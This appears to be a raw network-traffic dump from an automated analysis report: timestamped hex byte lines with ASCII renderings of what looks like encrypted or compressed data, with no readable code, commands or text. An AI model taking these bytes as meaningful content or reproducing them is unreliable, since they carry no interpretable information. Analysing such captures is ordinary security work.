                                      2023-03-20 10:23:12 UTC105INData Raw: c8 61 48 9f db a4 5b c8 33 47 ce 77 55 21 e2 80 bd c1 95 1d 2c 93 82 4f 41 34 02 77 da ae 15 88 4c 47 f8 51 45 ae 34 01 61 9b 53 c2 ef 30 60 fe 2e c7 ec dc 63 9f f1 a2 ab 5f f8 72 80 25 02 af cd a5 32 60 3b 89 fc 78 bd 2a 6d 51 36 53 51 93 63 d4 d7 66 25 41 b7 a2 2f ba 3a 18 48 1d d2 ab 53 7c a0 19 d7 d9 4f 1b 7e 55 c0 b9 2e 8a df de c5 57 73 bd 91 5a 43 84 a8 d3 f6 3b ef 79 98 ee cd cd a3 dc dd 6d ee c8 ed af ac 4b fb b0 5c 09 81 d2 13 bf 33 b7 36 17 1d aa e8 72 c6 a9 23 e8 6e 77 67 32 bf 7d 1e fb 01 5a 74 ee df 6f 88 35 d1 6b 6a 6b 25 4d 63 f0 0f 92 2c 01 d4 63 6b f2 79 18 6f db 45 20 9f a3 19 30 e3 3a 32 b3 f5 c4 c1 ba c6 79 fc 8c 6d 05 ed 30 cb 96 9f 4d 6e e1 d7 0c 15 01 27 af c9 f3 03 1e 07 9c 57 5c 29 0c 93 44 d6 f0 78 bd 5f d5 21 63 4c 72 12 50 30
                                      Data Ascii: aH[3GwU!,OA4wLGQE4aS0`.c_r%2`;x*mQ6SQcf%A/:HS|O~U.WsZC;ymK\36r#nwg2}Zto5kjk%Mc,ckyoE 0:2ym0Mn'W\)Dx_!cLrP0
                                      2023-03-20 10:23:12 UTC106INData Raw: 32 7b 88 71 92 68 bc 74 f0 9e cb 7e 74 a9 ce a1 d8 65 5a 4e c3 2b 08 ba d5 eb d2 1b 4d 92 00 46 a9 45 3b 37 80 ea 73 f5 34 00 32 60 65 02 d7 ee 55 9e ce a2 66 70 d9 2b f0 b2 36 54 33 59 92 38 73 de 07 2d e5 62 77 8a 58 2e d9 fa 24 2d 91 28 11 cf 0a 0e 03 89 82 c9 f2 b3 09 de eb 85 66 d8 57 4c cb 3e 49 20 e0 0e cf dc c8 31 7f d0 3c fb 19 ce 75 68 46 a0 cd 3f 8a 0f 7a 3d c3 2f 2e 1f ce 3a b9 e6 30 22 e0 1f 9a 68 6d 05 37 10 f4 83 ac 88 a0 74 2a e3 34 49 64 96 dd e6 e8 a7 c6 8a 29 83 c0 95 ac 39 93 7e 73 ee a1 49 64 64 7b a4 14 a8 8a 0b 4b 33 9c e8 ea 8b d5 19 30 d8 f8 96 28 56 de 49 f0 35 a5 5e b1 8c bb d5 46 c0 7a e3 7f 29 41 c1 2a 5d 87 ce 48 94 90 ac 20 22 51 69 eb ea 7d c0 f2 af d2 38 cb f6 39 ad ec 25 01 11 71 bd 56 a4 22 2c a2 95 69 27 d4 da aa 14 40
                                      Data Ascii: 2{qht~teZN+MFE;7s42`eUfp+6T3Y8s-bwX.$-(fWL>I 1<uhF?z=/.:0"hm7t*4Id)9~sIdd{K30(VI5^Fz)A*]H "Qi}89%qV",i'@
                                      2023-03-20 10:23:12 UTC107INData Raw: 77 17 b3 c4 17 fd 4a f6 a1 5f 84 e8 63 5b 80 60 d4 89 cf de 9e 43 ab d4 a4 4b c1 c9 46 f3 79 48 55 73 80 91 c7 92 4c 0f 0a 7c b7 a6 cc 29 48 fc af 3d e7 4e 47 fe 7f 7a ac 25 15 7d 8b 4e f1 df 2e 63 d6 79 dc e7 da 63 e9 6d a1 87 43 95 69 c0 27 04 f1 ef 9d 27 38 3a 98 f8 48 f8 00 75 56 59 3a 49 98 69 e1 1b 9e 0e 73 b6 d9 4a b0 3a 1b 7e c1 d1 84 2c 25 a4 21 b6 0c b0 f7 48 7a d3 8b 2c 8a 6a 17 c5 57 a2 ab 82 4f 6d 7c 90 71 f6 3b fe 7d 86 0a 32 e0 98 d7 b4 5e be ca eb 8d 2e 51 f0 ba 4d 16 69 c9 17 a8 34 b5 14 22 0c ae ee 0c d4 b6 29 1c 49 42 79 3a ba 49 bd f8 2d 55 1d e2 8f 6d 82 00 64 76 61 6b 3d 5f 8e f5 23 9d 2e 36 ab 10 62 fd 4b 73 75 c8 47 22 a6 e6 04 39 1b b7 6a bb fd d1 f6 2f d8 73 e5 ae 77 1f e9 2a 22 69 b2 76 6f fd ed 0e 15 0d 3b b0 c4 fa 6b 36 fb 9d
                                      Data Ascii: wJ_c[`CKFyHUsL|)H=NGz%}N.cycmCi''8:HuVY:IisJ:~,%!Hz,jWOm|q;}2^.QMi4")IBy:I-Umdvak=_#.6bKsuG"9j/sw*"ivo;k6
                                      2023-03-20 10:23:12 UTC108INData Raw: 49 23 8e 4c 70 13 9b e5 43 73 ce 8e b6 3c c1 cb ae 70 86 ca aa e3 6e e7 6e 36 3f 7e 2b da 17 58 17 33 a8 5c bc c8 e6 b6 e0 73 e6 ae ea 3a f6 8a 37 93 79 c9 5f 4d 23 16 b8 28 d1 39 77 ec d6 ea 8d 81 57 73 ac bd e2 3c c2 c7 bb 5a e4 81 dd 14 4e bf be 32 3e 3a e7 cb c6 c3 33 68 f3 25 38 d1 61 89 4f 48 97 e0 98 68 69 ed ab b1 dc 0c ba a3 cc f4 42 86 19 80 0e 2a 7a b6 b5 cd 20 cb d3 a7 47 ec 5e ab 4b e7 29 00 e9 97 14 a3 00 77 39 d3 57 6b b4 5e d5 b2 d2 22 4b b4 9c 37 85 a0 7d 58 3e f6 e7 aa 06 c9 0c 35 ea 32 70 4e 88 df da 99 a6 c6 e1 03 a1 c2 f8 d1 48 92 00 77 c4 b2 07 61 64 e0 e2 14 a8 f5 4b 4b 22 8a d4 d2 06 d5 3c 30 d8 ff e3 d6 57 f2 7b f2 5a 99 22 b1 8a 93 f2 3a cf 7f 7b ca d7 32 9a 9d a3 b2 24 d4 af 1a c6 a8 7f c6 1a 0f df c0 42 3f 99 a5 ce 11 ac 5b 9f
                                      Data Ascii: I#LpCs<pnn6?~+X3\s:7y_M#(9wWs<ZN2>:3h%8aOHhiB*z G^K)w9Wk^"K7}X>52pNHwadKK"<0W{Z":{2$B?[
                                      2023-03-20 10:23:12 UTC109INData Raw: 6f ae b5 b9 54 e1 d8 cd 8b c0 8c 00 f7 00 43 85 d0 c0 05 6c f4 e2 fb 0f ec 6f d7 af 40 bc ee 70 4c 88 6d d4 98 cb 36 6e ed ef 04 70 97 1d 03 8a 78 f1 e8 4e 8d 81 bd b0 65 57 39 80 98 5e 02 d3 1f 4f d4 be 08 89 09 55 e4 60 61 b0 37 1b 69 98 45 da c7 a3 66 f5 69 30 1f 3b 8e 6b 0a a3 87 49 22 12 ac 5d bf 02 51 23 8e 67 31 9f fa 2d 11 f2 68 7c 0f 75 62 a5 5e ff c7 98 24 6d cf 70 90 82 12 09 56 ff ea ae 5b 57 a5 21 b6 ea 26 a5 19 03 b2 a3 7a e3 17 bd 83 01 b5 bd 91 4b 19 08 bb 39 e9 1a da 52 91 ea 37 cc 8f d5 0c 1e 5b fd 5f 02 24 d3 f2 b0 5b 11 a9 fe 7c de c3 59 1c 38 1f aa 2f 13 43 ad c2 19 4c 6e 6c 32 00 23 94 d4 ab 99 a8 05 89 6d 88 3f 9e 6d 7e 19 75 4f 9c a4 27 8c 2a 21 ca bb 91 c0 f0 94 90 78 46 22 b7 e2 96 74 12 bb eb 65 46 29 1f 24 c7 79 f6 57 45 48 ee
                                      Data Ascii: oTClo@pLm6npxNeW9^OU`a7iEfi0;kI"]Q#g1-h|ub^$mpV[W!&zK9R7[_$[|Y8/CLnl2#m?m~uO'*!xF"teF)$yWEH
                                      2023-03-20 10:23:12 UTC111INData Raw: bd 3c 84 e2 2f 90 48 7b d6 ad cf 16 d1 bf 86 7f 1d de f3 ff d4 7b 09 bd 72 b2 9f 77 b4 9e b0 07 d5 e5 b1 9b 91 23 15 5a 1c 6d 92 68 bd 31 82 42 84 23 fd fc ca a5 aa 4e 73 4f b4 55 0e 89 a5 e8 a6 1e 38 e6 17 40 da 3e 4e 28 08 95 35 81 42 69 6a c8 1a 73 df c0 4e 8d c9 99 ac c1 dd 82 ab cc 73 03 e3 6f d3 78 24 23 40 71 b8 3a 34 d0 1c 9f 91 88 58 36 d3 69 4c 99 4f 76 07 ce 30 9c 81 e4 70 b7 f7 bc 98 27 19 81 32 74 b8 8c 59 8f 48 29 4a b3 df 71 ca 0b 83 4e f7 c9 8b 3e 4b cd 22 8a f5 8b 47 dc bd 83 3a c9 fb 64 c4 b2 16 b5 85 6a 6d 03 f4 aa 38 a8 6a cb 0c a6 f7 23 fa d8 90 67 53 55 47 65 1d 51 dc 6c 3e 1a 13 8d 5f bf b4 2c 3e a6 ba a7 28 66 d1 53 d1 0b 4b 22 17 11 cb 34 70 b0 98 72 55 52 72 ff 58 f4 29 f4 29 83 6a 2f 4f c1 e8 1c ac 5c c9 9b f0 42 9d ec 29 1f 8a
                                      Data Ascii: </H{{rw#Zmh1B#NsOU8@>N(5BijsNsox$#@q:4X6iLOv0p'2tYH)JqN>K"G:djm8j#gSUGeQl>_,>(fSK"4prURrX))j/O\B)
                                      2023-03-20 10:23:12 UTC112INData Raw: 5b bf 63 73 1b 5b 09 99 ca 56 f4 20 db 7b 87 40 a8 22 e6 3a 3c e9 f7 49 b5 c9 f3 b8 ff 9c 46 ed 80 20 a7 88 a5 3c 59 e7 b2 e8 1c ec 41 6a b2 29 e4 9a 0e 35 df 13 b5 e4 af a8 00 30 e4 db a4 5c d2 24 3a b9 0b d2 da 05 25 3d 48 35 d2 bd 1f 22 43 59 ca 03 c4 bf 0e 08 32 a3 b7 16 95 96 52 fb e4 87 52 49 da c7 28 c5 d8 b1 81 27 0a af 55 d8 74 42 bd 2e 8a 0b d0 22 a9 e5 9a 6e 4e 50 8f f8 4d 9e 35 5f 67 1c 69 70 a2 74 d1 f3 af 1b 7e 83 98 03 9d 07 2f 43 e1 e8 ab 6e 7e 8f 19 83 2b bd e4 78 7f 20 ac 30 db ee 48 78 fb 33 3a 0c cd c9 1f 00 c3 59 30 ef 79 9f c4 8c af ea 81 99 5d fb 89 ae f4 ea 10 af d0 57 11 7f d3 56 58 bf e6 13 23 19 b4 f4 07 d8 90 3a ff 4c 54 66 32 b8 61 81 6f 63 5e 61 85 9a 7e 8c 0d e6 63 6d 59 2e 54 9d f1 40 bb 0b 42 45 01 48 e9 56 7e 4f d4 49 20
                                      Data Ascii: [cs[V {@":<IF <YAj)50\$:%=H5"CY2RRI('UtB."nNPM5_gipt~/Cn~+x 0Hx3:Y0y]WVX#:LTf2aoc^a~cmY.T@BEHV~OI
                                      2023-03-20 10:23:12 UTC113INData Raw: 3e 53 f5 22 fd 1b b6 01 36 70 32 c0 70 9e 85 ef 82 58 82 a7 26 f3 e8 53 85 dd 96 31 47 02 46 74 5d a0 5c 23 f8 9e 78 b6 1f 3d 9e 5c 94 77 2e 13 8a 62 80 79 09 71 19 11 8b 30 7c 04 49 76 6e 33 22 ff 7e 50 ad fb 89 ce a1 b8 02 78 3d c6 29 70 eb d7 eb d8 0e 2c 4a 46 4a b4 54 24 31 62 e5 40 fd 36 16 1a a1 37 70 e1 eb 4d 8d c1
                                      Data Ascii: >S"6p2pX&S1GFt]\#x=\w.byq0|Ivn3"~Px=)p,JFJT$1b@67pM
                                      2023-03-20 10:23:12 UTC113INData Raw: a2 77 77 1b bd 60 94 cd e5 14 ba 78 82 f5 b2 19 3e e2 62 8b f1 13 c5 74 6f 8c 84 3b 86 ba c2 1b 09 1c 55 30 4e e8 11 94 64 69 09 24 86 0b c5 5b c8 c8 87 d8 0c cf da 68 7b b3 a4 dd 0d fc 2a 83 b2 9b ac cd 39 a0 33 4f 84 a2 60 64 4f 9b 60 2c a8 7c 53 f5 62 e8 06 0d 0e 58 3e f6 f6 0d e1 ff 67 2d e7 69 17 4f 93 df 87 8f b0 d2 a7 0e a1 c2 96 94 db 71 5a 5e ec 8f 12 57 55 cb 94 3e 8e d3 2f 52 25 8a e3 d2 71 da a8 4f e1 d8 af cf 45 f5 67 ee 5a 99 5c 87 56 1c 37 02 91 2f a5 21 66 0e 83 4d 3f f6 df 29 f9 f0 f3 6a 9a 29 2f ae ac 02 d2 b2 ff 8d 75 73 f7 39 a7 8d f7 8c 26 5d b5 49 b5 31 2e bd be 50 12 1a 81 bf 3c 63 9f dc 1e 73 2c d7 ef eb df e8 fa 04 09 94 10 5f 8b e4 cc ef a4 ca 4e 9d 8a 20 bc ce 56 13 d4 e2 e3 68 d0 85 00 6b 2c d0 1a 25 96 5e d7 53 e1 da 7e 28 b1
                                      Data Ascii: ww`x>bto;U0Ndi$[h{*93O`dO`,|SbX>g-iOqZ^WU>/R%qOEgZ\V7/!fM?)j)/us9&]I1.P<cs,_N Vhk,%^S~(
                                      2023-03-20 10:23:12 UTC114INData Raw: f0 ee 4a e1 64 ac 34 0b b8 a0 26 91 7b 82 da 58 b8 4d 78 47 ed 0c 92 23 0b da 50 e7 6c bf 9d 32 6c 09 ba fd bf 07 61 e9 25 9e 74 50 36 59 53 c0 a6 83 85 9a 24 6d b4 2d d9 59 41 c7 8b e7 d3 87 51 1a 16 52 bc 19 98 da 60 7b d3 89 2d 3a a3 32 d0 93 70 62 69 4f 55 8f 90 d6 f2 e3 aa aa 4a 3c c4 dc 8f d5 db cc f6 10 93 00 2c ec 51 13 fc a5 c1 6b 82 07 8b 01 b6 92 b9 ac ee 1d d0 78 58 0c 0a ef fe b0 07 d9 66 d3 2d 53 72 da 6d 3f ec 17 c2 42 53 43 0a 6a 95 f6 4a f7 21 39 5d 24 7c f4 56 4e 4f f2 73 10 9e e9 60 05 d7 99 6f 89 e3 c1 b0 2a dd 75 f9 b7 63 06 e5 37 dc 68 3e 9e 28 f1 06 c1 d4 e5 f9 64 0d 1b 0c 05 f9 9d 3d 58 53 3f 00 1d d4 f2 64 ff 68 c6 2f 61 64 31 b2 d2 73 75 62 9f 5f fc 55 f1 12 8c 1f 0f 81 97 d9 a3 d5 a3 ab ed a8 58 f6 ff a4 03 e0 a2 89 e7 89 ea 2c
                                      Data Ascii: Jd4&{XMxG#Pl2la%tP6YS$m-YAQR`{-:2pbiOUJ<,QkxXf-Srm?BSCjJ!9]$|VNOs`o*uc7h>(d=XS?dh/ad1sub_UX,
                                      2023-03-20 10:23:12 UTC116INData Raw: 2d 6f 3c 2d 7e 7c 7d a3 7d f5 f5 28 dd e1 39 1b b5 6a 2a 73 bc 92 33 26 08 68 c6 ac 45 e4 3a f6 9f e9 d5 80 43 cd 89 32 f9 34 2a 2d de fc 31 c1 e0 2a eb f1 f9 41 b7 3a 3b 49 c1 1f 28 4a 7a c4 4d b4 20 a3 09 08 df 0c ba e1 9c 47 56 89 3f a0 1e ca 6d 59 7d a3 fe 10 b0 02 69 14 d1 1e 68 18 de 2b 64 f2 28 2b f8 01 f2 4f 4c 30 71 62 b5 ce a7 5b 9c 78 25 f3 2e 22 1b 90 cb 9a 8b bc c1 ab 2a b1 c5 8c d0 6e 8b 6a 77 c5 b5 65 42 4d ea a4 14 a8 03 f1 73 1e 41 71 56 9f 54 9c b5 4f 59 43 d0 57 f2 5f 3f d2 05 23 41 35 3b cf df 36 78 f5 79 3f d0 2a 8a 2c 31 3d bf 62 69 45 e1 6c 56 45 fd e8 7e a9 b6 f3 c2 4f 36 b3 42 b7 fc 23 1b 0b 1d 08 e0 9e 51 06 9f be 7a 4f 20 db 86 1b ae 84 64 5c 9a 8f 5b 69 66 40 74 66 a0 fa 8f 10 5f 8b 6e 31 35 be 21 c5 15 1a 99 63 2f b0 ca 18 cf
                                      Data Ascii: -o<-~|}}(9j*s3&hE:C24*-1*A:;I(JzM GV?mY}ih+d(+OL0qb[x%."*njweBMsAqVTOYCW_?#A5;6xy?*,1=biElVE~O6B#QzO d\[if@tf_n15!c/
                                      2023-03-20 10:23:12 UTC117INData Raw: b5 14 1c 21 58 24 a5 a2 0d 6d d6 90 56 9f c7 52 30 a4 54 a5 ac 10 e1 e0 32 a0 fa b1 5f 87 1b 1e f0 83 0f fa 16 26 18 af 44 d0 5e 76 89 32 83 1c f3 dc 66 3d 64 bd aa f2 5b 30 ac 7b dc bd b0 bb 87 91 5a aa 10 05 62 d5 ae 76 66 e6 6e f2 e4 8d 20 1b 58 8e 8f 4b d0 4b c5 3d 3a a2 bd 1a 4a e9 70 9b 07 0e 95 6d 7f 4e 85 91 6f 61 b9 29 f7 35 a0 54 36 cd 94 8f d5 db 7b 3a 43 c4 ea c4 1f bf 88 10 2a 32 9a 77 f9 7c 8d 5f 79 24 e0 f3 55 98 e1 69 aa 05 27 53 0d 82 2d ae b0 6d 76 78 9d 98 7d 97 29 fc 5f 44 7f 3e 59 97 f1 29 97 26 0b 0c 0f 59 e8 4f 61 67 d1 5f 16 ee e8 15 26 f8 a1 56 9d d0 cb b1 35 cd 6f fd b0 67 3a c8 2b d7 70 90 6c 79 84 e9 54 15 0b 2d 9c 18 8c 5d 18 e5 80 66 28 36 45 3c 2d e9 e1 4b b6 4e c6 4e 79 2b 2b 0a 4a 2e 62 bb 54 ff 44 ec 3e cd 66 00 78 c1 d3
                                      Data Ascii: !X$mVR0T2_&D^v2f=d[0{Zbvfn XKK=:JpmNoa)5T6{:C*2w|_y$Ui'S-mvx})_D>Y)&YOag_&V5og:+plyT-]f(6E<-KNNy++J.bTD>fx
                                      2023-03-20 10:23:12 UTC118INData Raw: d7 98 a4 ca 57 1f 7c 95 3a 6c e7 c6 f2 dc 47 78 8b 17 58 ab 71 26 3a 7d e9 5b e1 16 3c 0c cb 64 02 dc e0 67 b7 f8 c0 13 04 ee a0 9e ea 52 34 df 70 d0 43 29 57 6a 50 80 00 26 d0 58 d0 d8 d6 df 22 db 64 d9 53 81 84 cd 0d ed 42 4e 2d be 65 70 30 13 b6 22 da 7d f4 f5 ab d3 0c cf da 68 a4 90 98 fb 2d ce 40 a7 8c af 6f 0c f8 43 f1 65 0d c1 2f b3 af 49 2a 96 1c cd 93 18 d7 5c 8b 80 ee 97 ec fe 83 aa 06 9c c2 a9 bd 13 37 74 95 b9 98 83 a3 ce 8e 03 a1 cb 87 c8 02 ef 04 11 85 eb 24 25 3e ee a4 14 a8 3e 78 5c 1c 33 4d 6f bf 7b 81 9c 7d 5d 28 72 ff 57 dd f5 5a 99 5c 46 79 b6 57 c4 59 f2 6d ed ab ed e2 32 5c 87 3a f8 04 bb 26 b4 47 dc df 67 57 c7 04 6f 1c dc 10 6f f7 54 08 42 65 12 14 5b bf 49 ba 24 0b a5 95 6e 30 0e eb 77 58 02 d0 85 4a 1c 50 80 9e ea ab 80 9f 1e 2d
                                      Data Ascii: W|:lGxXq&:}[<dgR4pC)WjP&X"dSBN-ep0"}h-@oCe/I*\7t$%>>x\3Mo{}](rWZ\FyWYm2\:&GgWooTBe[I$n0wXJP-
                                      2023-03-20 10:23:12 UTC119INData Raw: 50 93 3d e9 3d a2 e9 17 28 fe ca b3 53 e7 f5 7a e9 69 57 5a 8d 0a b8 0c d4 f1 ff 5d 5f ad bb 16 d4 9c 15 68 ea 27 b7 ad 02 86 97 48 ec 03 77 9d 45 07 f5 eb 55 47 8b 6c 4d 72 ca 3a 82 ab 87 49 fa 67 f0 1f 4f d7 96 f1 79 35 6b cb 93 78 a5 02 75 09 1c be 7a b3 5f fc ea a4 2e 68 ae b5 37 9c 0b 21 64 ee d6 bb 7a 6f 8b 0c 8d 10 ba ec 78 7f d3 5a 20 fe 24 69 64 eb 17 1d 31 f9 d6 87 90 71 f6 5b e1 3c bc d7 1d fa 9b dd dc 0b 88 d2 ed a5 8a ea 23 dc 44 d9 a0 1f f7 6f dc 53 e7 cc f3 64 3c c0 03 47 c5 3d 80 b5 a1 fc 64 b4 09 ea 2d 53 72 d3 ba 77 9c 14 c9 4a 7c 4e 15 6f 99 c7 03 b1 0f 00 74 22 4c e0 51 79 6d 72 f4 31 c8 2f c0 f6 3b 6c 9c 7b 0c 03 68 f8 1a be 30 40 fe e4 0a c8 01 a9 50 a1 9b 8a c3 0c 15 c3 a5 e2 c4 49 a9 bb 43 30 e0 d6 a4 aa bd 8a 53 55 f1 40 c9 78 9d
                                      Data Ascii: P==(SziWZ]_h'HwEUGlMr:IgOy5kxuz_.h7!dzoxZ $id1q[<#DoSd<G=d-SrwJ|Not"LQymr1/;l{h0@PIC0SU@x
                                      2023-03-20 10:23:12 UTC121INData Raw: 9b dd d8 fc f3 50 67 22 46 0a c5 70 ec 2e 21 ad 8f 7e bc cb 96 f8 8c 55 52 10 c0 21 7b e3 6c 26 63 15 c6 0c 92 46 a9 54 3c 6f 91 cc 5f d7 18 35 2c e5 47 10 e1 e5 4e 8d d9 1e 1d 38 8d b6 85 eb 5e 25 f1 53 ef 44 3f 5d 52 4b 80 1d 15 c1 2d a7 a6 af 44 49 f3 58 59 b1 64 74 61 f9 0f 84 89 ef 12 a0 af cd fc 5b d9 0a ad 56 16 36 99 32 9e 96 bf 50 26 e3 5a 8d 60 8f 79 40 78 a2 12 cc ab 39 d3 bf 7f 9e 89 a3 78 8b 77 e6 30 33 62 15 a9 0f 89 f1 b7 c9 05 70 4b f6 c2 7e 35 ea d0 ca 9f de 50 10 18 6a 4f 00 80 37 4c 15 43 4e 92 7e 77 b0 bc cd 31 7e fd b7 04 b5 d1 0c 4b 22 8a b2 63 78 a2 09 35 c8 ea 8f d7 47 e7 5f f2 5a 46 1d d0 eb 20 c3 e0 31 dc 5e c8 95 eb 55 8e e2 04 7e e2 30 3d 01 96 2d d3 42 fd e8 55 e0 09 03 f5 22 48 c5 0e 84 d9 11 0e 0b 59 a5 8d 89 a6 06 1f 22 cc
                                      Data Ascii: Pg"Fp.!~UR!{l&cFT<o_5,GN8^%SD?]RK-DIXYdta[V62P&Z`y@x9xw03bpK~5PjO7LCN~w1~K"cx5G_ZF 1^U~0=-BU"HY"
                                      2023-03-20 10:23:12 UTC122INData Raw: 51 0c 15 6e 04 84 a2 2a 7f e0 1c ff 62 e6 f4 fb d6 af 23 1a fc 2e 8b d6 8d ca 60 42 87 41 e5 f7 91 38 be ea 7d 57 5a 9c 3e c7 ea cc 2a 49 fe e0 2a 29 ab 06 5b cc ac 00 f1 9d 6f f2 29 22 e5 60 0e 77 9d 45 61 66 d4 00 77 f2 00 28 0e 63 86 0f a3 f9 fa bc 16 de 3d 52 e3 e2 81 25 6a 31 9f fa a0 ba e5 28 f5 82 f8 fd 31 d1 43 72 2b 8a 6e b4 a2 38 d1 3f cc 4f b2 82 86 55 57 a5 21 b1 a5 70 eb 49 4c e1 eb 3d 8a 6a de 32 a4 88 c0 5f 8c 90 48 03 b6 36 aa 2e b6 50 37 f2 03 19 10 cd 02 bc ca 34 a6 ee 0f 1a 59 b3 f8 93 3a 85 59 dd 5c a3 d1 f1 15 01 fc 31 44 cc 03 f0 85 6b 32 b8 61 63 a0 9a 05 93 66 20 dd 72 d9 1f 71 61 6b 22 fa d3 1d 58 40 e0 a1 c8 c6 85 3d 5a 79 6d db ab 22 60 94 87 b4 6c 2d 83 37 7c 4c 29 a7 48 7e f6 aa 77 3e 65 76 ad 36 c1 38 25 d0 96 6a 1b 0b 2d b7
                                      Data Ascii: Qn*b#.`BA8}WZ>*I*)[o)"`wEafw(c=R%j1(1Cr+n8?OUW!pIL=j2_H6.P74Y:Y\1Dk2acf rqak"X@=Zym"`l-7|L)H~w>ev68%j-
                                      2023-03-20 10:23:12 UTC123INData Raw: da 3d b3 83 57 23 e3 36 a0 b8 06 e3 4f 14 c8 13 2d 25 e1 dd 8a 8d a3 95 2b 43 62 45 18 c4 38 b0 76 7e f7 fc 4c bb a0 95 ed 83 13 46 17 a8 28 3a a9 8c ad a5 6e 52 98 13 49 6d 07 60 44 02 82 13 d6 4c 7b 61 96 30 62 b6 9f 29 d1 cd a2 77 77 52 79 bb ed ca b0 5c d7 84 31 5c 38 ed f2 76 0d fa 08 d2 6d 0b 49 bc b1 36 1b 16 cf 1b 8c e6 e5 4d 2c 2f 55 e3 7e 24 5c 6e f7 71 bc 11 81 9e e8 37 e6 38 37 0c eb bd 68 df 0b ee 1a 91 a9 8d 46 05 3d a0 0f 69 d0 db d8 65 a7 66 95 d6 e0 30 33 e2 ad cc f6 04 f8 b6 c1 01 76 7b 16 c9 7e 35 e3 82 e6 7c e0 a2 f5 d4 8f bd e2 79 fd 97 fe ac 24 f6 18 35 c0 b2 79 61 09 e7 a0 0e a0 ed 14 52 27 8a e3 d2 1f 42 5a 6b ae 81 fe a2 0f fd 5f f2 5a eb b6 0c 81 80 77 54 f6 22 f5 6e 3e 7c c7 2f 49 9c db 62 9b 90 ab 39 40 c3 d7 e3 11 bc 7d 18 aa
                                      Data Ascii: =W#6O-%+CbE8v~LF(:nRIm`DL{a0b)wwRy\1\8vmI6M,/U~$\nq787hF=ief03v{~5|y$5yaR'BZk_ZwT"n>|/Ib9@}
                                      2023-03-20 10:23:12 UTC124INData Raw: be ad fb 12 80 00 ea 19 94 99 67 9d 51 6e bc dd 4a c3 21 f3 aa 14 7e 48 f4 96 30 6a 28 c4 27 96 26 7a 87 42 3d a4 a4 97 64 d4 98 f3 57 23 5c da 9d ee 10 d4 cd 46 e2 96 7f c4 ce 0f 3b 41 20 ca 9f 8f 82 48 59 ba 2f 80 f1 bd 39 d8 7a 17 fc 6c 79 89 18 1e 6a 82 47 c2 f4 04 74 e2 33 c1 f8 eb 60 86 0f a3 81 f9 77 46 a1 54 76 db e8 9a 30 60 53 ed e7 45 aa 15 7e 5f 3b 49 41 b9 21 d4 c4 9e 03 75 b4 a2 38 f5 a6 cf 63 c6 e3 a2 51 33 93 00 85 37 a8 c5 5b 5f d2 91 1d a8 41 e9 ee 61 94 90 98 4f 55 8f 90 ca 8d 14 92 a7 51 3d fc cb 8f d5 db d1 89 fd e3 0e 36 e5 46 11 e1 84 6e d3 3f b0 59 7e cc 67 2f be ed 17 d9 b7 26 c8 78 63 6c 32 bd 77 e3 db 1d 57 72 81 8d e7 0b a7 f2 99 9e 93 dc 5d 9d f1 23 4d ea 64 7b a9 ea 52 fe d7 e1 7b e7 b0 a4 e2 1b 30 5b eb ab b6 17 01 75 f6 17
                                      Data Ascii: gQnJ!~H0j('&zB=dW#\F;A HY/9zlyjGt3`wFTv0`SE~_;IA!u8cQ37[_AaOUQ=6Fn?Y~g/&xcl2wWr]#Md{R{0[u
                                      2023-03-20 10:23:12 UTC125INData Raw: b9 83 d5 f0 f1 70 4f d5 87 c0 2f 10 65 84 31 47 53 54 a7 c0 ab cc a3 68 17 eb 3c 85 8f 33 c0 6b 08 fe 2e 0e 2b 8c 51 80 8d a3 b1 4c 8f 33 4a 61 b7 45 8d 5c 5f d7 f4 11 df 8f ce a1 d9 4b 8f 0c da 5e 1e 8c bd 82 ae 65 52 98 13 62 61 16 54 6c 32 a4 1e fd 36 16 1a 3f 8f 00 a2 76 de 0b cf a2 77 77 09 bd 97 be 91 f3 1a 8a 2d 9a 5b 38 1e 3e b2 e1 27 a7 63 fd f5 b6 0b 06 ad 3d 16 cf 1b 62 97 f7 23 c6 d8 b5 3b d8 db bb 98 27 a8 10 a4 8a 71 2f f8 2b a5 fb eb 13 51 84 3e fb 80 1b 44 42 d5 0c 67 c7 57 e3 6f 0d c1 2f 21 26 2b 6f 51 cb 19 4e 96 58 a6 6a 6d 03 0b 66 5f a1 d4 07 c9 7e 35 c5 d1 90 24 8a de 9d 99 a6 55 d3 6c e3 7c 97 d1 48 92 ad 3d da dd 87 6d 64 e0 a4 8d 19 67 34 ba cf 74 14 2e d3 38 e3 cc 2b 04 58 d9 57 f2 5f 60 03 be 48 6e 5b 46 86 b1 3d af 00 85 c4 a7
                                      Data Ascii: pO/e1GSTh<3k.+QL3JaE\_K^eRbaTl26?vww-[8>'c=b#;'q/+Q>DBgWo/!&+oQNXjmf_~5$Ul|H=mdg4t.8+XW_`Hn[F=
                                      2023-03-20 10:23:12 UTC127INData Raw: 52 f1 70 60 54 1b 4f 81 c4 59 1b 5b 08 d9 b7 70 8a 2c d6 6b f0 2e 83 5d de 35 a4 fb f7 03 f2 cd 84 df 80 f9 6e 8e 79 43 b9 87 fe 6f 19 96 da 86 65 9d 0d e6 c4 35 fb 9a 19 3e db 7c d4 98 cb 3b 5d 5d e7 4d 32 db 55 57 c7 66 ae c1 cb 5e 06 21 58 24 db a7 4b 1c da cf 4b 84 fb f1 ac 3d c9 0f ce 46 15 56 8c 10 38 42 8f 61 f7 ef 2f 00 da 15 e6 d2 bd 43 a8 6e 91 ab 69 de 69 f7 15 63 9a c1 ad 1e 01 04 ad ce 4b c4 27 51 66 18 74 66 b8 02 e1 e9 f9 16 49 9c 91 0d 9e 3e 3b 63 cd ff a3 42 53 a5 21 b2 d6 65 2f 71 b5 5e 49 a6 90 6a de c5 d6 bf 04 dc e3 a9 56 2b c0 0c c2 5e d0 3e 08 82 36 2e 6e 3f f9 54 18 09 43 6a a3 1e 45 89 01 7f d3 3f 39 31 ca 2d cc ce 19 57 ef 21 10 8a 51 af 88 8c c8 43 8d 3f f7 2d 53 72 1d b8 53 95 de 5b 91 dd cd fa 81 75 0c d2 62 d9 fb 6e 11 4e f8
                                      Data Ascii: Rp`TOY[p,k.]5nyCoe5>|;]]M2UWf^!X$KK=FV8Ba/CniicK'QftfI>;cBS!e/q^IjV+^>6.n?TCjE?91-W!QC?-SrS[ubnN
